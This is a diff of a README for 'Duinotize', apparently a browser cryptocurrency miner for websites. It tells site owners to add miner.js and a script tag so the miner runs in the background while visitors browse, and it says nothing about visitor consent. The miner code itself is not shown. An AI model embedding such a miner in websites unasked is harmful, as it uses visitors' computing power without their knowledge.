ryanfortner/Duinotize/README.md

 ## Installation
 Download [miner.js](https://github.com/mobilegmYT/Duinotize/raw/main/miner.js) + [hashes.js](https://github.com/mobilegmYT/Duinotize/raw/main/hashes.js), and put them in a new folder named `worker` in your website's root folder.
 For a example of how this is setup, look at https://github.com/Amog-OS/website, and you can also visit https://www.amogos.studio/ and open the dev console to see the code in action.

-Put the following code at the very bottom of the HTML page where you want the miner to start: (most likley your home page, as the miner will run in the background for the duration your visiters are on the site, not just the page)
+Put the following code at the very bottom of the HTML page where you want the miner to start:
 ```
 <script>
 let threads = "1";